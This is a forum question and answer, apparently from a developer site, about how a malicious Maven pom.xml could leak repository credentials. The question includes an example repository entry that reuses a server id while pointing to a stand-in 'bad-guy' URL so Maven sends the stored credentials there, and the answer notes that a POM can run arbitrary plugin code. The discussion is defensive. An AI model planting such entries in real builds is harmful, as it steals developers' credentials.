# Maven: Reduce the Risk to leak my Credentials when processing a malicous pom.xml

Tags: maven, security, continuous-integration

**Goal**: I want to make sure that my Credentials for a Maven Repository do not leak.

**Possible Threat**: Given that I store the credentials in the `settings.xml` file, someone could make me process a malicious `pom.xml` that includes a repository entry with a foreign URL and an `id` that matches my server entry. Resolving the dependencies of that `pom.xml` will transfer my credentials to that foreign server. -> Leak of Credentials

**Question**: Is there anything I can do against this?

**Details**:

Using Maven, the Credentials for a Server are stored in the `settings.xml` file.

E.g.

```xml
<settings>
  <servers>
    <server>
      <id>my-repo</id>
      <username>MY_USER</username>
      <password>MY_PASSWORD</password>
  </servers>
</settings>
```

The connection between the Server entry in the `settings.xml` and the Repository entry in the `pom.xml` is made using a matching id property.

E.g.

```xml
<repositories>
        <repository>
            <id>my-repo</id>
            <url>https://my-repo.de/</url>
            <releases>
                <enabled>true</enabled>
            </releases>
            <snapshots>
                <enabled>false</enabled>
            </snapshots>
        </repository>
</repositories>
```

What happens if a "bad guy" makes me use a `pom.xml` containing a fragment like this:

```xml
<repositories>
        <repository>
            <id>my-repo</id>
            <url>https://bad-guy.de/</url>
            <releases>
                <enabled>true</enabled>
            </releases>
            <snapshots>
                <enabled>false</enabled>
            </snapshots>
        </repository>
</repositories>
```

My credentials / authentication information will leak by being transferred to the bad guy's server (as the `id` matches with the server configured in the `settings.xml`).

Is there anything I can do to protect me and/or my CI-Pipelines from such attacks besides making sure that the code / `pom.xml` is trustworthy?

Comment: I do not completely understand what you have in mind. Should the "bad guy POM" be one of the dependencies? Or should it be a project that is built?

Comment: @JFabianMeier The scenario I originally had in mind is in the direction of the latter one ("a project that is built"). E.g.: I checkout a project from GitHub but did not check the pom for suspicious repository declarations. `nexus` or something like this could be a value for the id several "victims" might use and have in common in case they use a Sonatype Nexus Repository (as some tutorials show it that way). Such ids are easy to guess and I fear that a "bad guy" might exploit this to steal my credentials. But yes, maybe such "bad poms" could also be hidden in the dependencies and pose a risk.

Answer (score 0):

Generally, if you run Maven on a POM, then the POM could do anything that a normal Java program can do, like reading and writing files (mainly through Maven plugins, but also through e.g. embedded Ant code). So reading the `setting.xml` is no problem, it could actually very handily done from a self-written Maven plugin.

The situation is of course slightly different if the build server is disconnected from the internet (as in many companies). Then the POM can of course still do a lot of bad stuff on the server, but it cannot (at least directly) smuggle information to an outside listener.